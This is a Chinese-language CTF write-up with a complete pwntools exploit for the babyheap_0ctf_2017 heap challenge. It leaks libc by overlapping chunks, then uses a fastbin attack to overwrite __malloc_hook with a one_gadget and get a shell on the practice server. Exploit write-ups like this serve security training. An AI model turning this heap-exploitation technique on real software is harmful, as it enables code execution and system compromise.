babyheap_0ctf_2017

应该是一道非常入门的堆题orz

也没有什么好说的,漏洞是写没有长度限制,但他输出只能按一开始calloc的大小输出,还有一个问题是他read的条件有点严苛。我一开始用system结果没法传参。然后我发现可以用one_gadget就行了

主要目的就是leak libc然后改__malloc_hook

#!/usr/bin/env python
# coding=utf-8
from pwn import *
# from libnum import *

# context.log_level = 'debug'
context.terminal = ['xfce4-terminal','-x','bash','-c']
context.arch = 'i386'

s       = lambda string             :sh.send(string)
sl      = lambda string             :sh.sendline(string)
sla     = lambda delim,string       :sh.sendlineafter(delim,string)
sa      = lambda delim,string       :sh.sendafter(delim,string)
ru      = lambda string             :sh.recvuntil(string)
rl      = lambda                    :sh.recvline()
rv      = lambda                    :sh.recv()
it      = lambda                    :sh.interactive()
cl      = lambda                    :sh.close()

local = 0
if local:
  # sh = gdb.debug('./orw','b *0x08048571\nc')
  sh = remote('0.0.0.0', 9999)
  # sh = process('./babyheap_0ctf_2017')
  bin = ELF('./babyheap_0ctf_2017')
  libc = ELF('/root/ctf/PWN/libc/libc6_2.23-0ubuntu11_amd64.so')
  #libc = ELF('/lib/i386-linux-gnu/libc-2.23.so')
else:
  sh = remote('buuoj.cn', 20001)
  bin = ELF('./babyheap_0ctf_2017')
  libc = ELF('/root/ctf/PWN/libc/libc6_2.23-0ubuntu11_amd64.so',checksec = False)
def z(a=''):
  # gdb.attach(sh)
  gdb.attach('babyheap_0ctf_2017',a,exe='./babyheap_0ctf_2017')
  if a == '':
    raw_input()

def add(size):
  sla(':', '1')
  sla(':',str(size))

def update(index, size, content):
  sla(':', '2')
  sla(':', str(index))
  sla(':', str(size))
  sla(':', content)

def free(index):
  sla(':', '3')
  sla(':', str(index))

def dump(index):
  sla(':', '4')
  sla(':', str(index))


add(0x100)  # 0
add(0x100)  # 1
add(0x100)  # 2
add(0x100)  # 3
add(0x100)  # 4

free(1)
update(0, 0x110, 'a'*0x100 + '\x00' *0x8 + '\x21\x02' + '\x00'*6)
update(2,0x108,'b'*0x100 + '\x21\x02' + '\x00'*6)
free(1)
add(0x210)  # 1
update(1, 0x110,'c'*0x100 + '\x00'*8 + '\x11\x01' + '\x00'*6)
free(2)
dump(1)
ru(': \n')
main_arena = u64(rv()[0x110:0x118]) - 88
success('main_arena->{:#x}'.format(main_arena))
libc_base = main_arena + 0x7f22c259b000 - 0x7f22c295fb20
success('libc_base->{:#x}'.format(libc_base))
malloc_hook = libc.symbols['__malloc_hook'] + libc_base
success('malloc_hook->{:#x}'.format(malloc_hook))
system = libc.symbols['system'] + libc_base
success('system->{:#x}'.format(system))
one_gadget = 0x4526a + libc_base
success('one_gadget->{:#x}'.format(one_gadget))
sl('')
add(0x100)  # 2


fake_chunk_head  = malloc_hook - 0x1b -0x8
add(0x60)  # 5
add(0x60)  # 6
add(0x60)  # 7

free(6)
update(5, 0x78, 'd'*0x60 + '\x00'*8 + '\x71' + '\x00'*7 + p64(fake_chunk_head))
add(0x60)  # 6
add(0x60)  # 8
offset = malloc_hook - (fake_chunk_head + 0x10)
update(8, offset + 8, 'a' * offset + p64(one_gadget))

ru(':')
add(0x40)

# z('c')
it()

说点什么

avatar

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据

  Subscribe  
提醒